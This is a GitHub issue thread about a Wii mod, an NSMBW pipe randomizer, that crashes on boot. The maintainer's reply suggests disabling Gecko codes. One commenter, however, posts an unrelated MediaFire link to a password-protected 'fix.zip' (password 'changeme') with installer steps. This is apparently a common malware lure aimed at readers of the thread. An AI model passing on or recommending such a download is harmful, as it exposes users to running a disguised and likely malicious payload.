### ISSUE TITLE
(like some other people) crashes on boot. only see the "Warning" screen for a split second.

### ISSUE THREAD

**Issue by fadsasd** [mkwcat/nsmbw-pipe-randomizer#8]
So whenever i boot, it just crashes. heres a video.

https://github.com/user-attachments/assets/f57b5579-f9f8-4c24-a61b-28a403088ca7

(usually I can share link to file but im full on storage. hope this does! :>

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mkwcat** [comment]
You most likely have gecko codes enabled, please disable them
